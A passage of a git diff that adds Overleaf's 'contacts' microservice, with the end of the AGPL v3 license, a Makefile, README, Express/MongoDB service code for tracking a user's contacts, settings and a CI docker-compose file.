copy that you convey, +and you may offer support or warranty protection for a fee. + + 5. Conveying Modified Source Versions. + + You may convey a work based on the Program, or the modifications to +produce it from the Program, in the form of source code under the +terms of section 4, provided that you also meet all of these conditions: + + a) The work must carry prominent notices stating that you modified + it, and giving a relevant date. + + b) The work must carry prominent notices stating that it is + released under this License and any conditions added under section + 7. This requirement modifies the requirement in section 4 to + "keep intact all notices". + + c) You must license the entire work, as a whole, under this + License to anyone who comes into possession of a copy. This + License will therefore apply, along with any applicable section 7 + additional terms, to the whole of the work, and all its parts, + regardless of how they are packaged. This License gives no + permission to license the work in any other way, but it does not + invalidate such permission if you have separately received it. + + d) If the work has interactive user interfaces, each must display + Appropriate Legal Notices; however, if the Program has interactive + interfaces that do not display Appropriate Legal Notices, your + work need not make them do so. + + A compilation of a covered work with other separate and independent +works, which are not by their nature extensions of the covered work, +and which are not combined with it such as to form a larger program, +in or on a volume of a storage or distribution medium, is called an +"aggregate" if the compilation and its resulting copyright are not +used to limit the access or legal rights of the compilation's users +beyond what the individual works permit. Inclusion of a covered work +in an aggregate does not cause this License to apply to the other +parts of the aggregate. + + 6. Conveying Non-Source Forms. + + You may convey a covered work in object code form under the terms +of sections 4 and 5, provided that you also convey the +machine-readable Corresponding Source under the terms of this License, +in one of these ways: + + a) Convey the object code in, or embodied in, a physical product + (including a physical distribution medium), accompanied by the + Corresponding Source fixed on a durable physical medium + customarily used for software interchange. + + b) Convey the object code in, or embodied in, a physical product + (including a physical distribution medium), accompanied by a + written offer, valid for at least three years and valid for as + long as you offer spare parts or customer support for that product + model, to give anyone who possesses the object code either (1) a + copy of the Corresponding Source for all the software in the + product that is covered by this License, on a durable physical + medium customarily used for software interchange, for a price no + more than your reasonable cost of physically performing this + conveying of source, or (2) access to copy the + Corresponding Source from a network server at no charge. + + c) Convey individual copies of the object code with a copy of the + written offer to provide the Corresponding Source. This + alternative is allowed only occasionally and noncommercially, and + only if you received the object code with such an offer, in accord + with subsection 6b. + + d) Convey the object code by offering access from a designated + place (gratis or for a charge), and offer equivalent access to the + Corresponding Source in the same way through the same place at no + further charge. You need not require recipients to copy the + Corresponding Source along with the object code. If the place to + copy the object code is a network server, the Corresponding Source + may be on a different server (operated by you or a third party) + that supports equivalent copying facilities, provided you maintain + clear directions next to the object code saying where to find the + Corresponding Source. Regardless of what server hosts the + Corresponding Source, you remain obligated to ensure that it is + available for as long as needed to satisfy these requirements. + + e) Convey the object code using peer-to-peer transmission, provided + you inform other peers where the object code and Corresponding + Source of the work are being offered to the general public at no + charge under subsection 6d. + + A separable portion of the object code, whose source code is excluded +from the Corresponding Source as a System Library, need not be +included in conveying the object code work. + + A "User Product" is either (1) a "consumer product", which means any +tangible personal property which is normally used for personal, family, +or household purposes, or (2) anything designed or sold for incorporation +into a dwelling. In determining whether a product is a consumer product, +doubtful cases shall be resolved in favor of coverage. For a particular +product received by a particular user, "normally used" refers to a +typical or common use of that class of product, regardless of the status +of the particular user or of the way in which the particular user +actually uses, or expects or is expected to use, the product. A product +is a consumer product regardless of whether the product has substantial +commercial, industrial or non-consumer uses, unless such uses represent +the only significant mode of use of the product. + + "Installation Information" for a User Product means any methods, +procedures, authorization keys, or other information required to install +and execute modified versions of a covered work in that User Product from +a modified version of its Corresponding Source. The information must +suffice to ensure that the continued functioning of the modified object +code is in no case prevented or interfered with solely because +modification has been made. + + If you convey an object code work under this section in, or with, or +specifically for use in, a User Product, and the conveying occurs as +part of a transaction in which the right of possession and use of the +User Product is transferred to the recipient in perpetuity or for a +fixed term (regardless of how the transaction is characterized), the +Corresponding Source conveyed under this section must be accompanied +by the Installation Information. But this requirement does not apply +if neither you nor any third party retains the ability to install +modified object code on the User Product (for example, the work has +been installed in ROM). + + The requirement to provide Installation Information does not include a +requirement to continue to provide support service, warranty, or updates +for a work that has been modified or installed by the recipient, or for +the User Product in which it has been modified or installed. Access to a +network may be denied when the modification itself materially and +adversely affects the operation of the network or violates the rules and +protocols for communication across the network. + + Corresponding Source conveyed, and Installation Information provided, +in accord with this section must be in a format that is publicly +documented (and with an implementation available to the public in +source code form), and must require no special password or key for +unpacking, reading or copying. + + 7. Additional Terms. + + "Additional permissions" are terms that supplement the terms of this +License by making exceptions from one or more of its conditions. +Additional permissions that are applicable to the entire Program shall +be treated as though they were included in this License, to the extent +that they are valid under applicable law. If additional permissions +apply only to part of the Program, that part may be used separately +under those permissions, but the entire Program remains governed by +this License without regard to the additional permissions. + + When you convey a copy of a covered work, you may at your option +remove any additional permissions from that copy, or from any part of +it. (Additional permissions may be written to require their own +removal in certain cases when you modify the work.) You may place +additional permissions on material, added by you to a covered work, +for which you have or can give appropriate copyright permission. + + Notwithstanding any other provision of this License, for material you +add to a covered work, you may (if authorized by the copyright holders of +that material) supplement the terms of this License with terms: + + a) Disclaiming warranty or limiting liability differently from the + terms of sections 15 and 16 of this License; or + + b) Requiring preservation of specified reasonable legal notices or + author attributions in that material or in the Appropriate Legal + Notices displayed by works containing it; or + + c) Prohibiting misrepresentation of the origin of that material, or + requiring that modified versions of such material be marked in + reasonable ways as different from the original version; or + + d) Limiting the use for publicity purposes of names of licensors or + authors of the material; or + + e) Declining to grant rights under trademark law for use of some + trade names, trademarks, or service marks; or + + f) Requiring indemnification of licensors and authors of that + material by anyone who conveys the material (or modified versions of + it) with contractual assumptions of liability to the recipient, for + any liability that these contractual assumptions directly impose on + those licensors and authors. + + All other non-permissive additional terms are considered "further +restrictions" within the meaning of section 10. If the Program as you +received it, or any part of it, contains a notice stating that it is +governed by this License along with a term that is a further +restriction, you may remove that term. If a license document contains +a further restriction but permits relicensing or conveying under this +License, you may add to a covered work material governed by the terms +of that license document, provided that the further restriction does +not survive such relicensing or conveying. + + If you add terms to a covered work in accord with this section, you +must place, in the relevant source files, a statement of the +additional terms that apply to those files, or a notice indicating +where to find the applicable terms. + + Additional terms, permissive or non-permissive, may be stated in the +form of a separately written license, or stated as exceptions; +the above requirements apply either way. + + 8. Termination. + + You may not propagate or modify a covered work except as expressly +provided under this License. Any attempt otherwise to propagate or +modify it is void, and will automatically terminate your rights under +this License (including any patent licenses granted under the third +paragraph of section 11). + + However, if you cease all violation of this License, then your +license from a particular copyright holder is reinstated (a) +provisionally, unless and until the copyright holder explicitly and +finally terminates your license, and (b) permanently, if the copyright +holder fails to notify you of the violation by some reasonable means +prior to 60 days after the cessation. + + Moreover, your license from a particular copyright holder is +reinstated permanently if the copyright holder notifies you of the +violation by some reasonable means, this is the first time you have +received notice of violation of this License (for any work) from that +copyright holder, and you cure the violation prior to 30 days after +your receipt of the notice. + + Termination of your rights under this section does not terminate the +licenses of parties who have received copies or rights from you under +this License. If your rights have been terminated and not permanently +reinstated, you do not qualify to receive new licenses for the same +material under section 10. + + 9. Acceptance Not Required for Having Copies. + + You are not required to accept this License in order to receive or +run a copy of the Program. Ancillary propagation of a covered work +occurring solely as a consequence of using peer-to-peer transmission +to receive a copy likewise does not require acceptance. However, +nothing other than this License grants you permission to propagate or +modify any covered work. These actions infringe copyright if you do +not accept this License. Therefore, by modifying or propagating a +covered work, you indicate your acceptance of this License to do so. + + 10. Automatic Licensing of Downstream Recipients. + + Each time you convey a covered work, the recipient automatically +receives a license from the original licensors, to run, modify and +propagate that work, subject to this License. You are not responsible +for enforcing compliance by third parties with this License. + + An "entity transaction" is a transaction transferring control of an +organization, or substantially all assets of one, or subdividing an +organization, or merging organizations. If propagation of a covered +work results from an entity transaction, each party to that +transaction who receives a copy of the work also receives whatever +licenses to the work the party's predecessor in interest had or could +give under the previous paragraph, plus a right to possession of the +Corresponding Source of the work from the predecessor in interest, if +the predecessor has it or can get it with reasonable efforts. + + You may not impose any further restrictions on the exercise of the +rights granted or affirmed under this License. For example, you may +not impose a license fee, royalty, or other charge for exercise of +rights granted under this License, and you may not initiate litigation +(including a cross-claim or counterclaim in a lawsuit) alleging that +any patent claim is infringed by making, using, selling, offering for +sale, or importing the Program or any portion of it. + + 11. Patents. + + A "contributor" is a copyright holder who authorizes use under this +License of the Program or a work on which the Program is based. The +work thus licensed is called the contributor's "contributor version". + + A contributor's "essential patent claims" are all patent claims +owned or controlled by the contributor, whether already acquired or +hereafter acquired, that would be infringed by some manner, permitted +by this License, of making, using, or selling its contributor version, +but do not include claims that would be infringed only as a +consequence of further modification of the contributor version. For +purposes of this definition, "control" includes the right to grant +patent sublicenses in a manner consistent with the requirements of +this License. + + Each contributor grants you a non-exclusive, worldwide, royalty-free +patent license under the contributor's essential patent claims, to +make, use, sell, offer for sale, import and otherwise run, modify and +propagate the contents of its contributor version. + + In the following three paragraphs, a "patent license" is any express +agreement or commitment, however denominated, not to enforce a patent +(such as an express permission to practice a patent or covenant not to +sue for patent infringement). To "grant" such a patent license to a +party means to make such an agreement or commitment not to enforce a +patent against the party. + + If you convey a covered work, knowingly relying on a patent license, +and the Corresponding Source of the work is not available for anyone +to copy, free of charge and under the terms of this License, through a +publicly available network server or other readily accessible means, +then you must either (1) cause the Corresponding Source to be so +available, or (2) arrange to deprive yourself of the benefit of the +patent license for this particular work, or (3) arrange, in a manner +consistent with the requirements of this License, to extend the patent +license to downstream recipients. "Knowingly relying" means you have +actual knowledge that, but for the patent license, your conveying the +covered work in a country, or your recipient's use of the covered work +in a country, would infringe one or more identifiable patents in that +country that you have reason to believe are valid. + + If, pursuant to or in connection with a single transaction or +arrangement, you convey, or propagate by procuring conveyance of, a +covered work, and grant a patent license to some of the parties +receiving the covered work authorizing them to use, propagate, modify +or convey a specific copy of the covered work, then the patent license +you grant is automatically extended to all recipients of the covered +work and works based on it. + + A patent license is "discriminatory" if it does not include within +the scope of its coverage, prohibits the exercise of, or is +conditioned on the non-exercise of one or more of the rights that are +specifically granted under this License. You may not convey a covered +work if you are a party to an arrangement with a third party that is +in the business of distributing software, under which you make payment +to the third party based on the extent of your activity of conveying +the work, and under which the third party grants, to any of the +parties who would receive the covered work from you, a discriminatory +patent license (a) in connection with copies of the covered work +conveyed by you (or copies made from those copies), or (b) primarily +for and in connection with specific products or compilations that +contain the covered work, unless you entered into that arrangement, +or that patent license was granted, prior to 28 March 2007. + + Nothing in this License shall be construed as excluding or limiting +any implied license or other defenses to infringement that may +otherwise be available to you under applicable patent law. + + 12. No Surrender of Others' Freedom. + + If conditions are imposed on you (whether by court order, agreement or +otherwise) that contradict the conditions of this License, they do not +excuse you from the conditions of this License. If you cannot convey a +covered work so as to satisfy simultaneously your obligations under this +License and any other pertinent obligations, then as a consequence you may +not convey it at all. For example, if you agree to terms that obligate you +to collect a royalty for further conveying from those to whom you convey +the Program, the only way you could satisfy both those terms and this +License would be to refrain entirely from conveying the Program. + + 13. Remote Network Interaction; Use with the GNU General Public License. + + Notwithstanding any other provision of this License, if you modify the +Program, your modified version must prominently offer all users +interacting with it remotely through a computer network (if your version +supports such interaction) an opportunity to receive the Corresponding +Source of your version by providing access to the Corresponding Source +from a network server at no charge, through some standard or customary +means of facilitating copying of software. This Corresponding Source +shall include the Corresponding Source for any work covered by version 3 +of the GNU General Public License that is incorporated pursuant to the +following paragraph. + + Notwithstanding any other provision of this License, you have +permission to link or combine any covered work with a work licensed +under version 3 of the GNU General Public License into a single +combined work, and to convey the resulting work. The terms of this +License will continue to apply to the part which is the covered work, +but the work with which it is combined will remain governed by version +3 of the GNU General Public License. + + 14. Revised Versions of this License. + + The Free Software Foundation may publish revised and/or new versions of +the GNU Affero General Public License from time to time. Such new versions +will be similar in spirit to the present version, but may differ in detail to +address new problems or concerns. + + Each version is given a distinguishing version number. If the +Program specifies that a certain numbered version of the GNU Affero General +Public License "or any later version" applies to it, you have the +option of following the terms and conditions either of that numbered +version or of any later version published by the Free Software +Foundation. If the Program does not specify a version number of the +GNU Affero General Public License, you may choose any version ever published +by the Free Software Foundation. + + If the Program specifies that a proxy can decide which future +versions of the GNU Affero General Public License can be used, that proxy's +public statement of acceptance of a version permanently authorizes you +to choose that version for the Program. + + Later license versions may give you additional or different +permissions. However, no additional obligations are imposed on any +author or copyright holder as a result of your choosing to follow a +later version. + + 15. Disclaimer of Warranty. + + THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY +APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT +HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY +OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, +THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR +PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM +IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF +ALL NECESSARY SERVICING, REPAIR OR CORRECTION. + + 16. Limitation of Liability. + + IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING +WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS +THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY +GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE +USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF +DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD +PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), +EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF +SUCH DAMAGES. + + 17. Interpretation of Sections 15 and 16. + + If the disclaimer of warranty and limitation of liability provided +above cannot be given local legal effect according to their terms, +reviewing courts shall apply local law that most closely approximates +an absolute waiver of all civil liability in connection with the +Program, unless a warranty or assumption of liability accompanies a +copy of the Program in return for a fee. + + END OF TERMS AND CONDITIONS + + How to Apply These Terms to Your New Programs + + If you develop a new program, and you want it to be of the greatest +possible use to the public, the best way to achieve this is to make it +free software which everyone can redistribute and change under these terms. + + To do so, attach the following notices to the program. It is safest +to attach them to the start of each source file to most effectively +state the exclusion of warranty; and each file should have at least +the "copyright" line and a pointer to where the full notice is found. + + <one line to give the program's name and a brief idea of what it does.> + Copyright (C) <year> <name of author> + + This program is free software: you can redistribute it and/or modify + it under the terms of the GNU Affero General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU Affero General Public License for more details. + + You should have received a copy of the GNU Affero General Public License + along with this program. If not, see <http://www.gnu.org/licenses/>. + +Also add information on how to contact you by electronic and paper mail. + + If your software can interact with users remotely through a computer +network, you should also make sure that it provides a way for users to +get its source. For example, if your program is a web application, its +interface could display a "Source" link that leads users to an archive +of the code. There are many ways you could offer source, and different +solutions will be better for different programs; see section 13 for the +specific requirements. + + You should also get your employer (if you work as a programmer) or school, +if any, to sign a "copyright disclaimer" for the program, if necessary. +For more information on this, and how to apply and follow the GNU AGPL, see +<http://www.gnu.org/licenses/>. diff --git a/services/contacts/Makefile b/services/contacts/Makefile new file mode 100644 index 0000000..97a348d --- /dev/null +++ b/services/contacts/Makefile @@ -0,0 +1,156 @@ +# This file was auto-generated, do not edit it directly. +# Instead run bin/update_build_scripts from +# https://github.com/overleaf/internal/ + +BUILD_NUMBER ?= local +BRANCH_NAME ?= $(shell git rev-parse --abbrev-ref HEAD) +PROJECT_NAME = contacts +BUILD_DIR_NAME = $(shell pwd | xargs basename | tr -cd '[a-zA-Z0-9_.\-]') + +DOCKER_COMPOSE_FLAGS ?= -f docker-compose.yml +DOCKER_COMPOSE := BUILD_NUMBER=$(BUILD_NUMBER) \ + BRANCH_NAME=$(BRANCH_NAME) \ + PROJECT_NAME=$(PROJECT_NAME) \ + MOCHA_GREP=${MOCHA_GREP} \ + docker compose ${DOCKER_COMPOSE_FLAGS} + +COMPOSE_PROJECT_NAME_TEST_ACCEPTANCE ?= test_acceptance_$(BUILD_DIR_NAME) +DOCKER_COMPOSE_TEST_ACCEPTANCE = \ + COMPOSE_PROJECT_NAME=$(COMPOSE_PROJECT_NAME_TEST_ACCEPTANCE) $(DOCKER_COMPOSE) + +COMPOSE_PROJECT_NAME_TEST_UNIT ?= test_unit_$(BUILD_DIR_NAME) +DOCKER_COMPOSE_TEST_UNIT = \ + COMPOSE_PROJECT_NAME=$(COMPOSE_PROJECT_NAME_TEST_UNIT) $(DOCKER_COMPOSE) + +clean: + -docker rmi ci/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) + -docker rmi us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) + -$(DOCKER_COMPOSE_TEST_UNIT) down --rmi local + -$(DOCKER_COMPOSE_TEST_ACCEPTANCE) down --rmi local + +HERE=$(shell pwd) +MONOREPO=$(shell cd ../../ && pwd) +# Run the linting commands in the scope of the monorepo. +# Eslint and prettier (plus some configs) are on the root. +RUN_LINTING = docker run --rm -v $(MONOREPO):$(MONOREPO) -w $(HERE) node:20.18.2 npm run --silent + +RUN_LINTING_CI = docker run --rm --volume $(MONOREPO)/.editorconfig:/overleaf/.editorconfig --volume $(MONOREPO)/.eslintignore:/overleaf/.eslintignore --volume $(MONOREPO)/.eslintrc:/overleaf/.eslintrc --volume $(MONOREPO)/.prettierignore:/overleaf/.prettierignore --volume $(MONOREPO)/.prettierrc:/overleaf/.prettierrc --volume $(MONOREPO)/tsconfig.backend.json:/overleaf/tsconfig.backend.json ci/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) npm run --silent + +# Same but from the top of the monorepo +RUN_LINTING_MONOREPO = docker run --rm -v $(MONOREPO):$(MONOREPO) -w $(MONOREPO) node:20.18.2 npm run --silent + +SHELLCHECK_OPTS = \ + --shell=bash \ + --external-sources +SHELLCHECK_COLOR := $(if $(CI),--color=never,--color) +SHELLCHECK_FILES := { git ls-files "*.sh" -z; git grep -Plz "\A\#\!.*bash"; } | sort -zu + +shellcheck: + @$(SHELLCHECK_FILES) | xargs -0 -r docker run --rm -v $(HERE):/mnt -w /mnt \ + koalaman/shellcheck:stable $(SHELLCHECK_OPTS) $(SHELLCHECK_COLOR) + +shellcheck_fix: + @$(SHELLCHECK_FILES) | while IFS= read -r -d '' file; do \ + diff=$$(docker run --rm -v $(HERE):/mnt -w /mnt koalaman/shellcheck:stable $(SHELLCHECK_OPTS) --format=diff "$$file" 2>/dev/null); \ + if [ -n "$$diff" ] && ! echo "$$diff" | patch -p1 >/dev/null 2>&1; then echo "\033[31m$$file\033[0m"; \ + elif [ -n "$$diff" ]; then echo "$$file"; \ + else echo "\033[2m$$file\033[0m"; fi \ + done + +format: + $(RUN_LINTING) format + +format_ci: + $(RUN_LINTING_CI) format + +format_fix: + $(RUN_LINTING) format:fix + +lint: + $(RUN_LINTING) lint + +lint_ci: + $(RUN_LINTING_CI) lint + +lint_fix: + $(RUN_LINTING) lint:fix + +typecheck: + $(RUN_LINTING) types:check + +typecheck_ci: + $(RUN_LINTING_CI) types:check + +test: format lint typecheck shellcheck test_unit test_acceptance + +test_unit: +ifneq (,$(wildcard test/unit)) + $(DOCKER_COMPOSE_TEST_UNIT) run --rm test_unit + $(MAKE) test_unit_clean +endif + +test_clean: test_unit_clean +test_unit_clean: +ifneq (,$(wildcard test/unit)) + $(DOCKER_COMPOSE_TEST_UNIT) down -v -t 0 +endif + +test_acceptance: test_acceptance_clean test_acceptance_pre_run test_acceptance_run + $(MAKE) test_acceptance_clean + +test_acceptance_debug: test_acceptance_clean test_acceptance_pre_run test_acceptance_run_debug + $(MAKE) test_acceptance_clean + +test_acceptance_run: +ifneq (,$(wildcard test/acceptance)) + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) run --rm test_acceptance +endif + +test_acceptance_run_debug: +ifneq (,$(wildcard test/acceptance)) + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) run -p 127.0.0.9:19999:19999 --rm test_acceptance npm run test:acceptance -- --inspect=0.0.0.0:19999 --inspect-brk +endif + +test_clean: test_acceptance_clean +test_acceptance_clean: + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) down -v -t 0 + +test_acceptance_pre_run: +ifneq (,$(wildcard test/acceptance/js/scripts/pre-run)) + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) run --rm test_acceptance test/acceptance/js/scripts/pre-run +endif + +benchmarks: + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) run --rm test_acceptance npm run benchmarks + +build: + docker build \ + --pull \ + --build-arg BUILDKIT_INLINE_CACHE=1 \ + --tag ci/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) \ + --tag us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) \ + --tag us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):$(BRANCH_NAME) \ + --cache-from us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):$(BRANCH_NAME) \ + --cache-from us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):main \ + --file Dockerfile \ + ../.. + +tar: + $(DOCKER_COMPOSE) up tar + +publish: + + docker push $(DOCKER_REPO)/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) + + +.PHONY: clean \ + format format_fix \ + lint lint_fix \ + build_types typecheck \ + lint_ci format_ci typecheck_ci \ + shellcheck shellcheck_fix \ + test test_clean test_unit test_unit_clean \ + test_acceptance test_acceptance_debug test_acceptance_pre_run \ + test_acceptance_run test_acceptance_run_debug test_acceptance_clean \ + benchmarks \ + build tar publish \ diff --git a/services/contacts/README.md b/services/contacts/README.md new file mode 100644 index 0000000..5d84152 --- /dev/null +++ b/services/contacts/README.md @@ -0,0 +1,11 @@ +overleaf/contacts +=================== + +An API for tracking contacts of a user + +License +------- + +The code in this repository is released under the GNU AFFERO GENERAL PUBLIC LICENSE, version 3. A copy can be found in the `LICENSE` file. + +Copyright (c) Overleaf, 2015-2019. diff --git a/services/contacts/app.js b/services/contacts/app.js new file mode 100644 index 0000000..0d22ff3 --- /dev/null +++ b/services/contacts/app.js @@ -0,0 +1,24 @@ +// Metrics must be initialized before importing anything else +import '@overleaf/metrics/initialize.js' + +import logger from '@overleaf/logger' +import Settings from '@overleaf/settings' +import { mongoClient } from './app/js/mongodb.js' +import { app } from './app/js/server.js' + +const { host, port } = Settings.internal.contacts + +try { + await mongoClient.connect() +} catch (err) { + logger.fatal({ err }, 'Cannot connect to mongo. Exiting.') + process.exit(1) +} + +app.listen(port, host, err => { + if (err) { + logger.fatal({ err }, `Cannot bind to ${host}:${port}. Exiting.`) + process.exit(1) + } + logger.debug(`contacts starting up, listening on ${host}:${port}`) +}) diff --git a/services/contacts/app/js/ContactManager.js b/services/contacts/app/js/ContactManager.js new file mode 100644 index 0000000..574a18a --- /dev/null +++ b/services/contacts/app/js/ContactManager.js @@ -0,0 +1,24 @@ +import { db, ObjectId } from './mongodb.js' + +export async function touchContact(userId, contactId) { + await db.contacts.updateOne( + { user_id: new ObjectId(userId.toString()) }, + { + $inc: { + [`contacts.${contactId}.n`]: 1, + }, + $set: { + [`contacts.${contactId}.ts`]: new Date(), + }, + }, + { upsert: true } + ) +} + +export async function getContacts(userId) { + const user = await db.contacts.findOne({ + user_id: new ObjectId(userId.toString()), + }) + + return user?.contacts +} diff --git a/services/contacts/app/js/Errors.js b/services/contacts/app/js/Errors.js new file mode 100644 index 0000000..931579b --- /dev/null +++ b/services/contacts/app/js/Errors.js @@ -0,0 +1,6 @@ +export class NotFoundError extends Error { + constructor(message) { + super(message) + this.name = 'NotFoundError' + } +} diff --git a/services/contacts/app/js/HttpController.js b/services/contacts/app/js/HttpController.js new file mode 100644 index 0000000..27bbdbb --- /dev/null +++ b/services/contacts/app/js/HttpController.js @@ -0,0 +1,48 @@ +import logger from '@overleaf/logger' +import * as ContactManager from './ContactManager.js' +import { buildContactIds } from './contacts.js' + +const CONTACT_LIMIT = 50 + +export function addContact(req, res, next) { + const { user_id: userId } = req.params + const { contact_id: contactId } = req.body + + if (contactId == null || contactId === '') { + res.status(400).send('contact_id should be a non-blank string') + return + } + + logger.debug({ userId, contactId }, 'adding contact') + + Promise.all([ + ContactManager.touchContact(userId, contactId), + ContactManager.touchContact(contactId, userId), + ]) + .then(() => { + res.sendStatus(204) + }) + .catch(error => { + next(error) + }) +} + +export function getContacts(req, res, next) { + const { user_id: userId } = req.params + const { limit } = req.query + + const contactLimit = + limit == null ? CONTACT_LIMIT : Math.min(parseInt(limit, 10), CONTACT_LIMIT) + + logger.debug({ userId }, 'getting contacts') + + ContactManager.getContacts(userId) + .then(contacts => { + res.json({ + contact_ids: buildContactIds(contacts, contactLimit), + }) + }) + .catch(error => { + next(error) + }) +} diff --git a/services/contacts/app/js/contacts.js b/services/contacts/app/js/contacts.js new file mode 100644 index 0000000..36a142c --- /dev/null +++ b/services/contacts/app/js/contacts.js @@ -0,0 +1,13 @@ +export function buildContactIds(contacts, limit) { + return Object.entries(contacts || {}) + .map(([id, { n, ts }]) => ({ id, n, ts })) + .sort(sortContacts) + .slice(0, limit) + .map(contact => contact.id) +} + +// sort by decreasing count, decreasing timestamp. +// i.e. highest count, most recent first. +function sortContacts(a, b) { + return a.n === b.n ? b.ts - a.ts : b.n - a.n +} diff --git a/services/contacts/app/js/mongodb.js b/services/contacts/app/js/mongodb.js new file mode 100644 index 0000000..d3d161a --- /dev/null +++ b/services/contacts/app/js/mongodb.js @@ -0,0 +1,17 @@ +import Metrics from '@overleaf/metrics' +import Settings from '@overleaf/settings' +import { MongoClient } from 'mongodb' + +export { ObjectId } from 'mongodb' + +export const mongoClient = new MongoClient( + Settings.mongo.url, + Settings.mongo.options +) +const mongoDb = mongoClient.db() + +export const db = { + contacts: mongoDb.collection('contacts'), +} + +Metrics.mongodb.monitor(mongoClient) diff --git a/services/contacts/app/js/server.js b/services/contacts/app/js/server.js new file mode 100644 index 0000000..7d4cc88 --- /dev/null +++ b/services/contacts/app/js/server.js @@ -0,0 +1,32 @@ +import * as Metrics from '@overleaf/metrics' +import logger from '@overleaf/logger' +import express from 'express' +import bodyParser from 'body-parser' +import * as HttpController from './HttpController.js' +import * as Errors from './Errors.js' + +logger.initialize('contacts') +Metrics.event_loop?.monitor(logger) +Metrics.open_sockets.monitor() + +export const app = express() +app.use(Metrics.http.monitor(logger)) +Metrics.injectMetricsRoute(app) + +app.get('/user/:user_id/contacts', HttpController.getContacts) +app.post( + '/user/:user_id/contacts', + bodyParser.json({ limit: '2mb' }), + HttpController.addContact +) + +app.get('/status', (req, res) => res.send('contacts is alive')) + +app.use(function (error, req, res, next) { + logger.error({ err: error }, 'request errored') + if (error instanceof Errors.NotFoundError) { + return res.sendStatus(404) + } else { + return res.status(500).send('Oops, something went wrong') + } +}) diff --git a/services/contacts/buildscript.txt b/services/contacts/buildscript.txt new file mode 100644 index 0000000..8563d1b --- /dev/null +++ b/services/contacts/buildscript.txt @@ -0,0 +1,9 @@ +contacts +--dependencies=mongo +--docker-repos=us-east1-docker.pkg.dev/overleaf-ops/ol-docker +--env-add= +--env-pass-through= +--esmock-loader=True +--node-version=20.18.2 +--public-repo=False +--script-version=4.7.0 diff --git a/services/contacts/config/settings.defaults.cjs b/services/contacts/config/settings.defaults.cjs new file mode 100644 index 0000000..7ffdb83 --- /dev/null +++ b/services/contacts/config/settings.defaults.cjs @@ -0,0 +1,24 @@ +const http = require('node:http') +const https = require('node:https') + +http.globalAgent.maxSockets = 300 +http.globalAgent.keepAlive = false +https.globalAgent.keepAlive = false + +module.exports = { + internal: { + contacts: { + port: 3036, + host: process.env.LISTEN_ADDRESS || '127.0.0.1', + }, + }, + + mongo: { + url: + process.env.MONGO_CONNECTION_STRING || + `mongodb://${process.env.MONGO_HOST || '127.0.0.1'}/sharelatex`, + options: { + monitorCommands: true, + }, + }, +} diff --git a/services/contacts/docker-compose.ci.yml b/services/contacts/docker-compose.ci.yml new file mode 100644 index 0000000..51eb64d --- /dev/null +++ b/services/contacts/docker-compose.ci.yml @@ -0,0 +1,52 @@ +# This file was auto-generated, do not edit it directly. +# Instead run bin/update_build_scripts from +# https://github.com/overleaf/internal/ + +version: "2.3" + +services: + test_unit: + image: ci/$PROJECT_NAME:$BRANCH_NAME-$BUILD_NUMBER + user: node + command: npm run test:unit:_run + environment: + NODE_ENV: test + NODE_OPTIONS: "--unhandled-rejections=strict" + + + test_acceptance: + build: . + image: ci/$PROJECT_NAME:$BRANCH_NAME-$BUILD_NUMBER + environment: + ELASTIC_SEARCH_DSN: es:9200 + MONGO_HOST: mongo + POSTGRES_HOST: postgres + MOCHA_GREP: ${MOCHA_GREP} + NODE_ENV: test + NODE_OPTIONS: "--unhandled-rejections=strict" + depends_on: + mongo: + condition: service_started + user: node + command: npm run test:acceptance + + + tar: + build: . + image: ci/$PROJECT_NAME:$BRANCH_NAME-$BUILD_NUMBER + volumes: + - ./:/tmp/build/ + command: tar -czf /tmp/build/build.tar.gz --exclude=build.tar.gz --exclude-vcs . + user: root + mongo: + image: mongo:6.0.13 + command: --replSet overleaf + volumes: + - ../../bin/shared/mongodb-init-replica-set.js:/docker-entrypoint-initdb.d/mongodb-init-replica-set.js + environment: + MONGO_INITDB_DATABASE: sharelatex + extra_hosts: + # Required when using the automatic database setup for initializing the + # replica set. This override is not needed when running the setup after + # starting up mongo. + - mongo:127.0.0.1 diff --git 